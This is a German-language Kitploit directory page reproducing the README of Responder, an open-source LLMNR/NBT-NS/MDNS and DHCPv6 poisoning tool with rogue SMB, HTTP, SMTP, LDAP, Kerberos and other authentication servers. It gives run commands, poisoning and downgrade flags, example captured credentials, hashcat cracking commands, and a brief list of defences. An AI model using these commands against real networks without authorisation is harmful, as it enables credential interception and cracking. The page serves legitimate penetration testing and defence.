Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Responder — Responder ist ein LLMNR-, NBT-NS- und MDNS-Vergifter mit integriertem HTTP/SMB/MSSQL/FTP/LDAP-Rogue-Authentifizierungsserver, der NTLMv1/NTLMv2/LMv2, erweiterte Sicherheit NTLMSSP und Basic-HTTP-Authentifizierung unterstützt. | Kitploit
Tools/GitHubGitHub/lgandx/responder
Passwort-CrackingAufklärungDNS- und Subdomain-EnumerationExploitationInformationsbeschaffungNetzwerksicherheitPenetrationstestsAuthentifizierungDNS-FuzzingRed TeamingDNS-Analyse
6.5k867vor 2 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
lgandx/responder

Responder

Responder ist ein LLMNR-, NBT-NS- und MDNS-Vergifter mit integriertem HTTP/SMB/MSSQL/FTP/LDAP-Rogue-Authentifizierungsserver, der NTLMv1/NTLMv2/LMv2, erweiterte Sicherheit NTLMSSP und Basic-HTTP-Authentifizierung unterstützt.

Repository anzeigen

Responder

Python Version License

Responder ist ein LLMNR-, NBT-NS- und MDNS-Poisoner mit integrierten betrügerischen Authentifizierungsservern für HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS und mehr. Es unterstützt NTLMv1/NTLMv2/LMv2, erweitertes NTLMSSP und verschiedene Authentifizierungsmethoden über 15+ Protokolle.


Inhaltsverzeichnis

  • Übersicht
  • Neuerungen
  • Installation
  • Schnellstart
  • Netzwerk-Poisoning
  • Betrügerische Server
  • Konfiguration
  • macOS
  • Fehlerbehebung

Übersicht

Responder fängt Anmeldedaten ab, indem es auf LLMNR-, NBT-NS- und MDNS-Namensauflösungsanfragen antwortet. Wenn ein Client versucht, einen nicht existierenden Hostnamen aufzulösen, antwortet Responder und leitet den Client zum Angreifer-Rechner, wo mehrere betrügerische Authentifizierungsserver Anmeldedaten abfangen. DHCP- und DHCPv6-betrügerische Server sind ebenfalls enthalten und können separat aktiviert werden.

Erfasste Daten:

  • NetNTLMv1/v2-Hashes – Mit hashcat/john knackbar
  • Kerberos AS-REQ-Hashes – Offline-Knacken (hashcat -m 7500)
  • Klartext-Anmeldedaten – HTTP Basic, FTP, SMTP, IMAP, LDAP, SQL, etc.
  • Challenge-Response – CRAM-MD5, DIGEST-MD5

Neuerungen

Diese Version beinhaltet:

DHCPv6- & DNS-Verbesserungen

  • ✅ DHCPv6 INFORMATION-REQUEST – Volle Windows 10/11-Kompatibilität
  • ✅ Domain-Filterung – Gezielte Domänen ansprechen (DHCPv6 & DNS)
  • ✅ Router-Advertisements – Optionales IPv6-Netzwerk-Poisoning

E-Mail-Server-Upgrades

  • ✅ SMTP STARTTLS – Abfangen von modernen E-Mail-Clients
  • ✅ IMAP STARTTLS – Port 143 mit TLS-Upgrade
  • ✅ IMAPS – Natives SSL auf Port 993
  • ✅ Verbessertes POP3 – Bessere Kompatibilität

Kerberos-Verbesserungen

  • ✅ Force AS-REQ – Erzwingt Kerberos-Authentifizierung.
  • ✅ NTLM-Fallback versuchen – Nach dem Abfangen der Kerberos-Authentifizierung KDC_ERR_ETYPE_NOSUPP zurückgeben

Protokollverbesserungen

  • ✅ MSSQL – SQL-Server-Authentifizierung abfangen
  • ✅ LDAP/LDAPS – Verzeichnisdienst-Anmeldedaten
  • ✅ RDP – Remote Desktop-Authentifizierung
  • ✅ WinRM – Windows-Remoteverwaltung
  • ✅ DCERPC – Windows-RPC-Authentifizierung

Installation

Voraussetzungen

  • Python 2.7 oder Python 3.x
  • Linux (Ubuntu, Kali, Debian empfohlen)
  • Root-Rechte

Systemabhängigkeiten```bash

sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces

root@kitploit:~
### Responder installieren```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

Installation überprüfen```bash

sudo python3 Responder.py --help

root@kitploit:~
---

## Schnellstart

### Grundlegende Vergiftung```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

DHCPv6-Angriff```bash

Edit Responder.conf first:

[DHCPv6 Server]

DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

root@kitploit:~
### HTTP-Basisauthentifizierung erzwingen```bash
sudo python3 Responder.py -I eth0 -b -v

Proxy Auth + Rogue DHCP aktivieren```bash

Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)

sudo python3 Responder.py -I eth0 -Pvd

root@kitploit:~
---

## Netzwerkvergiftung

### LLMNR/NBT-NS/MDNS-Vergiftung

**Zweck:** Auf Namensauflösungsfehler reagieren

**Funktionsweise:**
1. Client sendet eine Broadcast-Anfrage nach einem nicht existierenden Host
2. Responder antwortet: „Ich bin dieser Host“
3. Client verbindet sich mit dem Angreifer
4. Anmeldeinformationen werden erfasst

**Konfiguration:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

Verwendung:```bash sudo python3 Responder.py -I eth0 -v

root@kitploit:~
---

### DHCPv6 Server

**Zweck:** Zwingt Clients, den DNS des Angreifers über IPv6 zu nutzen

**Funktionen:**
- ✅ INFORMATION-REQUEST Unterstützung (Windows 10/11)
- ✅ SOLICIT/REQUEST Unterstützung
- ✅ Domain-Filterung (chirurgische Zielauswahl)
- ✅ Router Advertisement (optional)

**Funktionsweise:**
1. Windows sendet DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST
2. Responder antwortet: DNS = IPv6 des Angreifers
3. Windows priorisiert IPv6 DNS
4. Alle DNS-Anfragen → Angreifer
5. DNS-Vergiftung → Erfassung von Anmeldedaten

**Konfiguration:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

Verwendung:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v

root@kitploit:~
**Erwartete Ausgabe:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

Betrügerische Server

Responder enthält 17+ betrügerische Authentifizierungsserver:

Datei- und Netzwerkdienste

SMB-Server (Ports 445, 139)

Zweck: Erfassung von NetNTLM-Hashes aus Dateifreigaben

Funktionen:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ NetNTLMv1/v2-Hash-Erfassung
  • ✅ Erweiterte Sicherheit NTLMSSP
  • ✅ Sitzungssignierung deaktiviert (ermöglicht Relay)

Auslöser:```powershell

UNC paths

\attacker-ip\share \non-existent-server\files

NET USE commands

net use \attacker-ip\share

Windows Explorer address bar

\attacker-ip\

root@kitploit:~
**Erfasstes Format:**```
username::domain:challenge:response:blob

Knacken:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

root@kitploit:~
**Konfiguration:**```ini
[Responder Core]
SMB = On

FTP-Server (Port 21)

Zweck: Erfassen von Klartext-FTP-Anmeldedaten

Funktionen:

  • ✅ Anonymer Login-Honeypot
  • ✅ USER/PASS-Authentifizierung
  • ✅ Erfassen von Klartext-Anmeldedaten

Auslöser:```bash ftp attacker-ip

Username: anything

Password: anything

root@kitploit:~
**Erfasstes Format:**```
[FTP] Cleartext: username:password

Konfiguration:```ini [Responder Core] FTP = On

root@kitploit:~
---

### Datenbankserver

#### MSSQL-Server (Port 1433)

**Zweck:** Microsoft SQL Server-Authentifizierung erfassen

**Funktionen:**
- ✅ SQL Server-Authentifizierung
- ✅ Windows-Authentifizierung (NTLM)
- ✅ SQL-Anmeldedaten im Klartext
- ✅ NetNTLMv2-Hash-Erfassung

**Auslöser:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

Erfasste Formate:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

root@kitploit:~
**Konfiguration:**```ini
[Responder Core]
SQL = On

Hinweise:

  • Erfasst sowohl SQL-Authentifizierung als auch Windows-Authentifizierung
  • Funktioniert mit SSMS, sqlcmd, ADO.NET-Verbindungen
  • Kann Domänenanmeldeinformationen über Windows-Authentifizierung erfassen

E-Mail-Server

SMTP-Server (Port 25, 587)

Zweck: Erfassen der E-Mail-Client-Authentifizierung

Funktionen:

  • ✅ STARTTLS-Unterstützung (moderne Clients)
  • ✅ AUTH PLAIN (Klartext)
  • ✅ AUTH LOGIN (Klartext)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM (NetNTLMv2)

STARTTLS-Ablauf:``` Client → EHLO Server → 250-STARTTLS Client → STARTTLS Server → 220 Ready to start TLS [TLS handshake using self-signed cert] Client → AUTH PLAIN Server → Captured! ✅

root@kitploit:~
**Auslöser:**```
Email client configuration:
- Server: attacker-ip
- Port: 25 or 587
- Security: STARTTLS or None
- Username: anything
- Password: anything

Erfasste Formate:``` [SMTP] LOGIN: [email protected]:Password123 [SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob [SMTP] CRAM-MD5: user:challenge:response

root@kitploit:~
**Konfiguration:**```ini
[Responder Core]
SMTP = On

Zertifikatswarnungen: Warnungen zu selbstsignierten Zertifikaten sind normal. Clients lehnen den ersten Versuch ab, wiederholen ihn und sind erfolgreich. Anmeldedaten werden dennoch erfasst.


IMAP-Server (Port 143)

Zweck: Erfasst IMAP-Authentifizierung mit STARTTLS

Funktionen:

  • ✅ STARTTLS-Unterstützung
  • ✅ LOGIN-Befehl (Klartext)
  • ✅ AUTHENTICATE PLAIN
  • ✅ AUTHENTICATE LOGIN
  • ✅ AUTHENTICATE NTLM

STARTTLS-Ablauf:``` Client → CAPABILITY Server → * CAPABILITY IMAP4 AUTH=PLAIN AUTH=NTLM STARTTLS Client → STARTTLS Server → OK Begin TLS negotiation now [TLS upgrade] Client → LOGIN user password Server → Captured! ✅

root@kitploit:~
**Konfiguration:**```ini
[Responder Core]
IMAP = On

IMAPS Server (Port 993)

Zweck: IMAP über SSL (native Verschlüsselung)

Funktionen:

  • ✅ Native SSL ab Verbindungsstart
  • ✅ Alle IMAP-Authentifizierungsmethoden
  • ✅ Kein STARTTLS erforderlich (bereits verschlüsselt)

Wie unterscheidet es sich von IMAP:``` Port 143 (IMAP): Plain → STARTTLS → Encrypted Port 993 (IMAPS): Encrypted from start

root@kitploit:~
**Konfiguration:**```ini
[Responder Core]
IMAPS = On

POP3 Server (Port 110)

Zweck: Erfassen von POP3-E-Mail-Abruf-Anmeldedaten

Funktionen:

  • ✅ USER/PASS-Authentifizierung
  • ✅ APOP (MD5-Challenge)
  • ✅ Erfassung von Klartext-Anmeldedaten

Auslöser:``` Email client:

  • Protocol: POP3
  • Server: attacker-ip
  • Port: 110
root@kitploit:~
**Erfasstes Format:**```
[POP3] USER: username
[POP3] PASS: password

Konfiguration:```ini [Responder Core] POP = On

root@kitploit:~
---

### Webserver

#### HTTP-Server (Port 80)

**Zweck:** Web-Authentifizierung erfassen

**Funktionen:**
- ✅ NTLM-Authentifizierung (NetNTLMv1/v2)
- ✅ Basic-Authentifizierung (Klartext)
- ✅ Digest-Authentifizierung (MD5)
- ✅ WPAD-Injektion

**Auslöser:**```
Browser: http://attacker-ip/
UNC: file://attacker-ip/share
WPAD: Automatic proxy detection

Basic Auth erzwingen:```bash sudo python3 Responder.py -I eth0 -b

root@kitploit:~
**Erfasste Formate:**```
[HTTP] NTLM NTLMv2: user::DOMAIN:challenge:response:blob
[HTTP] Basic: user:password
[HTTP] Digest: user:realm:hash

Konfiguration:```ini [Responder Core] HTTP = On

root@kitploit:~
---

#### HTTPS-Server (Port 443)

**Zweck:** HTTPS mit Authentifizierungserfassung

**Funktionen:**
- ✅ SSL/TLS-Verschlüsselung
- ✅ Alle HTTP-Authentifizierungsmethoden
- ✅ Selbstsigniertes Zertifikat
- ✅ WPAD über HTTPS

**Konfiguration:**```ini
[Responder Core]
HTTPS = On
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

Verzeichnis & Authentifizierung

Kerberos-Server (Port 88)

Zweck: AS-REP-Hashes für Offline-Cracking erfassen

Funktionen:

  • ✅ AES256-CTS-HMAC-SHA1-96 (etype 18)
  • ✅ AES128-CTS-HMAC-SHA1-96 (etype 17)
  • ✅ ARCFOUR-HMAC-MD5 (etype 23)

So funktioniert es:

  1. Client sendet AS-REQ (TGT-Anfrage)
  2. Responder: „Vorauthentifizierung erforderlich“
  3. Client sendet AS-REQ mit verschlüsseltem Zeitstempel
  4. Responder erfasst verschlüsselten Zeitstempel
  5. Offline mit hashcat knacken

Knacken:```bash hashcat -m 7500 kerberos-asreq.txt wordlist.txt

root@kitploit:~
**Konfiguration:**```ini
[Responder Core]
Kerberos = On

LDAP-Server (Port 389)

Zweck: Erfassen der LDAP-Verzeichnisauthentifizierung

Funktionen:

  • ✅ Einfache Authentifizierung (Klartext)
  • ✅ NTLM-Authentifizierung
  • ✅ Active Directory-Abfragen

Auslöser:```bash

LDAP query

ldapsearch -H ldap://attacker-ip -D "CN=user,DC=corp,DC=local" -w password

Active Directory tools

dsquery user -d attacker-ip

root@kitploit:~
**Erfasste Formate:**```
[LDAP] Simple: CN=user,DC=corp,DC=local:password
[LDAP] NetNTLMv2: user::DOMAIN:challenge:response:blob

Konfiguration:```ini [Responder Core] LDAP = On

root@kitploit:~
---

#### LDAPS Server (Port 636)

**Zweck:** LDAP über SSL

**Funktionen:**
- ✅ SSL/TLS-Verschlüsselung
- ✅ Alle LDAP-Authentifizierungsmethoden

**Konfiguration:**```ini
[Responder Core]
LDAP = On

Remote Access

RDP-Server (Port 3389)

Zweck: Erfassen der Remote-Desktop-Authentifizierung

Funktionen:

  • ✅ Network Level Authentication (NLA)
  • ✅ NetNTLMv2-Hash-Erfassung
  • ✅ CredSSP-Authentifizierung

Auslöser:``` Remote Desktop Client:

  • Computer: attacker-ip
  • Username: anything
  • Password: anything
root@kitploit:~
**Erfasstes Format:**```
[RDP] NetNTLMv2: user::DOMAIN:challenge:response:blob

Konfiguration:```ini [Responder Core] RDP = On

root@kitploit:~
**Hinweis:** Erfasst NLA-Authentifizierung vor der Desktop-Sitzung.

---

#### WinRM Server (Ports 5985, 5986)

**Zweck:** Erfasst Windows Remote Management-Anmeldedaten

**Funktionen:**
- ✅ HTTP (5985) und HTTPS (5986)
- ✅ Basic-Authentifizierung
- ✅ NTLM-Authentifizierung
- ✅ Kerberos-Authentifizierung

**Auslöser:**```powershell
# PowerShell remoting
Enter-PSSession -ComputerName attacker-ip
Invoke-Command -ComputerName attacker-ip -ScriptBlock { whoami }

# WinRM command line
winrm invoke -remote:http://attacker-ip

Erfasste Formate:``` [WinRM] Basic: DOMAIN\user:password [WinRM] NetNTLMv2: user::DOMAIN:challenge:response:blob

root@kitploit:~
**Konfiguration:**```ini
[Responder Core]
WINRM = On

Infrastruktur

DNS-Server (Port 53 TCP/UDP)

Zweck: Schurkischer DNS mit Domainfilterung

Funktionen:

  • ✅ A/AAAA-Eintragsvergiftung
  • ✅ MX-Eintragsvergiftung (E-Mail-Umleitung)
  • ✅ SOA-Einträge (erscheinen autoritativ)
  • ✅ SRV-Einträge (Kerberos, LDAP)
  • ✅ SVCB/HTTPS-Einträge (moderne Browser)
  • ✅ EDNS0-Unterstützung
  • ✅ Domainfilterung

Konfiguration:```ini [DHCPv6 Server] ; DNS uses same domain filter as DHCPv6 DHCPv6_Domain = corp.local

root@kitploit:~
**Wie es funktioniert:**```
Query: mail.corp.local
Response: 192.168.1.100 (attacker)
Client connects to attacker's SMTP
Credentials captured!

Supported Record Types:

  • A (IPv4) - Umleiten zum Angreifer
  • AAAA (IPv6) - Umleiten zum Angreifer
  • MX (Mail) - E-Mail-Server-Poisoning
  • SRV (Services) - Kerberos, LDAP usw.
  • SOA (Authority) - Als autoritativ erscheinen
  • TXT (Text) - SPF-Einträge
  • SVCB/HTTPS (Service Binding) - Moderne Browser

Domain Filtering Example:``` DHCPv6_Domain = corp.local

mail.corp.local → POISONED ✅ dc01.corp.local → POISONED ✅ google.com → IGNORED (normal DNS)

root@kitploit:~
**Konfiguration:**```ini
[Responder Core]
DNS = On

DCERPC-Server (Port 135)

Zweck: Windows-RPC-Authentifizierung erfassen

Funktionen:

  • ✅ NTLM-Authentifizierung
  • ✅ Windows-Dienstaufzählung
  • ✅ NetNTLMv2-Erfassung

Auslöser:``` Windows services querying RPC endpoint mapper WMI queries Remote registry access

root@kitploit:~
**Erfasstes Format:**```
[DCERPC] NetNTLMv2: user::DOMAIN:challenge:response:blob

Konfiguration:```ini [Responder Core] DCERPC = On

root@kitploit:~
---

## Konfiguration

### Hauptkonfigurationsdatei

Bearbeite `Responder.conf`:```ini
[Responder Core]
; === Network Services ===
SQL = On        # MSSQL (port 1433)
SMB = On        # SMB (ports 445, 139)
RDP = On        # Remote Desktop (port 3389)
Kerberos = On   # Kerberos (port 88)
FTP = On        # FTP (port 21)
POP = On        # POP3 (port 110)
SMTP = On       # SMTP with STARTTLS (port 25/587)
IMAP = On       # IMAP with STARTTLS (port 143)
IMAPS = On      # IMAPS with SSL (port 993)
HTTP = On       # HTTP (port 80)
HTTPS = On      # HTTPS (port 443)
DNS = On        # DNS (port 53)
LDAP = On       # LDAP/LDAPS (ports 389/636)
DCERPC = On     # Windows RPC (port 135)
WINRM = On      # Windows Remote Management (ports 5985/5986)

; === Poisoners ===
LLMNR = On      # Link-Local Multicast Name Resolution
NBTNS = On      # NetBIOS Name Service
MDNS = On       # Multicast DNS
DHCP = Off      # DHCP (IPv4) - use with caution
DHCPv6 = On     # DHCPv6 (IPv6) - use with more caution

; === Settings ===
SessionLog = On
LogToFile = On
Verbose = Yes
Database = Responder.db

; === SSL Certificates ===
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

[HTTP Server]
HtmlFilename = files/AccessDenied.html

[DHCPv6 Server]
; Target specific domain 
DHCPv6_Domain = corp.local

; Send Router Advertisements (use with caution)
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

Kommandozeilenoptionen

Grundlegende Verwendung```bash

sudo python3 Responder.py [options]

root@kitploit:~
### Erforderliche Argumente

| Option | Beschreibung |
|--------|-------------|
| `-I eth0, --interface=eth0` | Netzwerkschnittstelle zur Verwendung (verwenden Sie 'ALL' für alle Schnittstellen) |

### Vergiftungsoptionen

| Option | Beschreibung |
|--------|-------------|
| `-A, --analyze` | Analysemodus – NBT-NS-, MDNS-, LLMNR-Anfragen anzeigen, ohne zu antworten |
| `-w, --wpad` | Starte WPAD-Rogue-Proxy-Server (Standard: Aus) |
| `-F, --ForceWpadAuth` | Erzwinge NTLM/Basic-Authentifizierung beim Abruf von wpad.dat (alte Netzwerke)|
| `-P, --ProxyAuth` | Erzwinge NTLM/Basic-Authentifizierung für den Proxy (sehr effektiv) |

### DHCP/DHCPv6-Optionen

| Option | Beschreibung |
|--------|-------------|
| `-d, --DHCP` | Aktiviere DHCP-Broadcast-Antworten mit WPAD-Injection (IPv4) |
| `-D, --DHCP-DNS` | DNS-Server in DHCP-Antwort einfügen anstelle von WPAD |
| `--dhcpv6` | Aktiviere DHCPv6-Vergiftung (antwortet auf SOLICIT-Nachrichten) |

### IP-Vergiftungsoptionen

| Option | Beschreibung |
|--------|-------------|
| `-e 10.0.0.22, --externalip=10.0.0.22` | Vergifte Anfragen mit einer anderen IPv4-Adresse |
| `-6 ADDR, --externalip6=ADDR` | Vergifte Anfragen mit einer anderen IPv6-Adresse |
| `-i 10.0.0.21, --ip=10.0.0.21` | Lokale IP zur Verwendung (nur macOS) |

### Authentifizierungsoptionen

| Option | Beschreibung |
|--------|-------------|
| `-b, --basic` | HTTP-Basic-Authentifizierung zurückgeben (Standard: NTLM) |
| `--lm` | Erzwinge LM-Hash-Downgrade (Windows XP/2003) |
| `--disable-ess` | Erzwinge Downgrade der erweiterten Sicherheit NTLMSSP |

### Erweiterte Optionen

| Option | Beschreibung |
|--------|-------------|
| `-u HOST:PORT, --upstream-proxy=HOST:PORT` | Upstream-HTTP-Proxy für schädlichen WPAD |
| `-t 1e, --ttl=1e` | Windows-TTL für vergiftete Antworten ändern (hex: 30s=1e, oder 'random') |
| `-N NAME, --AnswerName=NAME` | Kanonischer Name für LLMNR-Antworten (nützlich für Kerberos-Relay) |
| `-E, --ErrorCode` | STATUS_LOGON_FAILURE zurückgeben (ermöglicht WebDAV-Authentifizierungserfassung) |

### Ausgabeoptionen

| Option | Beschreibung |
|--------|-------------|
| `-v, --verbose` | Erhöhe die Ausführlichkeit (empfohlen) |
| `-Q, --quiet` | Leiser Modus – Deaktiviert die Ausgabe des Vergifters |

### Informationen

| Option | Beschreibung |
|--------|-------------|
| `--version` | Programmversion anzeigen und beenden |
| `-h, --help` | Hilfemeldung anzeigen und beenden |

---

### Speicherorte```
Responder.db                    # SQLite database
logs/
├── HTTP-NTLMv2-<IP>.txt       # HTTP NetNTLMv2 hashes
├── SMB-NTLMv2-<IP>.txt        # SMB NetNTLMv2 hashes
├── MSSQL-NTLMv2-<IP>.txt      # MSSQL NetNTLMv2 hashes
├── Kerberos-AES-<IP>.txt      # Kerberos AS-REP hashes
├── SMTP-Cleartext-<IP>.txt    # SMTP cleartext credentials
├── IMAP-NTLMv2-<IP>.txt       # IMAP NetNTLMv2 hashes
├── FTP-Cleartext-<IP>.txt     # FTP cleartext credentials
├── LDAP-Cleartext-<IP>.txt    # LDAP cleartext credentials
├── RDP-NTLMv2-<IP>.txt        # RDP NetNTLMv2 hashes
└── WinRM-NTLMv2-<IP>.txt      # WinRM NetNTLMv2 hashes

Datenbankabfrage```bash

sqlite3 Responder.db

Show tables

.tables

Show all captured hashes

SELECT * FROM hashes;

Export to CSV

.mode csv .output hashes.csv SELECT * FROM hashes; .quit

root@kitploit:~
---

### OpSec-Überlegungen

**Erkennungsindikatoren:**
- Ungewöhnliche LLMNR/NBT-NS-Antworten
- Rogue DHCP/DHCPv6-Server
- Ungültige Kerberos-Vorauthentifizierungsanfragen
- Selbstsignierte SSL-Zertifikate
- Mehrere Authentifizierungsfehler
- Verdächtige DNS-Antworten

**Abwehrmaßnahmen:**
- Deaktivieren Sie MDNS/LLMNR/NBT-NS über GPO
- Aktivieren Sie DHCP-Snooping auf dem Switch
- Aktivieren Sie IPv6-RA-Guard
- Aktivieren Sie DHCPv6-Guard
- Überwachen Sie auf rogue DHCPv6-Server

---

## macOS

Responder funktioniert unter macOS, erfordert jedoch das Flag `-i`, um Ihre lokale IP-Adresse anzugeben. macOS unterstützt nicht die Socket-Option `SO_BINDTODEVICE`, die unter Linux für die Schnittstellenbindung verwendet wird.

### Verwendung des Launcher-Skripts

Das enthaltene Skript `macOS_Launcher.sh` behandelt Service-Konflikte automatisch:```bash
sudo ./macOS_Launcher.sh -I en0

Der Launcher wird:

  • Automatisch Ihre IP von der Schnittstelle erkennen (oder -i übergeben, um zu überschreiben)
  • SIP-Status prüfen und Einschränkungen melden
  • Störende macOS-Dienste anhalten (Kerberos, mDNSResponder, SMB, NetBIOS), wenn SIP deaktiviert ist
  • Portkonflikte melden, wenn SIP aktiviert ist
  • Alle angehaltenen Dienste wiederherstellen, wenn Responder beendet wird (auch bei Strg+C)

Direktes Ausführen```bash

Find your IP

ipconfig getifaddr en0

Run with explicit IP

sudo python3 Responder.py -I en0 -i 192.168.1.100

root@kitploit:~
### Systemintegritätsschutz (SIP)

Bei aktiviertem SIP (Standard) verhindert macOS, dass Systemdienste gestoppt werden, die an Ports binden, die Responder benötigt. Sie haben drei Optionen:

1. **Verwenden Sie das Launcher-Skript** — es meldet Konflikte und fährt mit den verfügbaren Diensten fort.
2. **Deaktivieren Sie widersprüchliche Module** in `Responder.conf` (z.B. `SMB = Off`, `DNS = Off`)
3. **Deaktivieren Sie SIP** für die volle Funktionalität (siehe [Dokumentation von Apple](https://developer.apple.com/documentation/security/disabling-and-enabling-system-integrity-protection))

---

## Fehlerbehebung

### Häufige Probleme

**Zugriff verweigert:**```bash
sudo python3 Responder.py -I eth0

Schnittstelle nicht gefunden:```bash ip link show sudo python3 Responder.py -I wlan0

root@kitploit:~
**Port bereits in Verwendung:**```bash
sudo netstat -tulpn | grep 445
sudo systemctl stop smbd nmbd

DHCPv6 funktioniert nicht:```bash

Enable IPv6

sudo sysctl -w net.ipv6.conf.all.disable_ipv6=0

Verify

sysctl net.ipv6.conf.all.disable_ipv6

root@kitploit:~
**Keine Hashes erfasst:**```bash
# Verify servers running
sudo python3 Responder.py -I eth0 -v

# Check firewall
sudo iptables -L

# Monitor traffic
sudo tcpdump -i eth0 port 445 or port 88 or port 389

Debug-Modus```bash

Very verbose output

sudo python3 Responder.py -I eth0 -vv

Tail logs

tail -f logs/Responder-Session.log

Network monitoring

sudo tcpdump -i eth0 -w responder-capture.pcap

root@kitploit:~
---

## Danksagungen

**Autor:** Laurent Gaffié
- GitHub: https://github.com/lgandx
- Website: https://secorizon.com/
- Twitter: @secorizon

---

## Spende
Sie können zu diesem Projekt beitragen, indem Sie an die folgende USDT- oder Bitcoin-Adresse spenden:

USDT: 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A

BTC: bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

Paypal:

https://paypal.me/PythonResponder

---

## Danksagungen
Die Entwicklung von Late Responder wurde durch Spenden von Einzelpersonen und Unternehmen ermöglicht.

Wir möchten uns bei den folgenden Hauptsponsoren bedanken:

SecureWorks: https://www.secureworks.com/

Synacktiv: https://www.synacktiv.com/

Black Hills Information Security: http://www.blackhillsinfosec.com/

TrustedSec: https://www.trustedsec.com/

Red Siege Information Security: https://www.redsiege.com/

Open-Sec: http://www.open-sec.com/

Und allen, ALLEN Pentestern auf der ganzen Welt, die an dieses Projekt gespendet haben.

Vielen Dank.
Tool herunterladen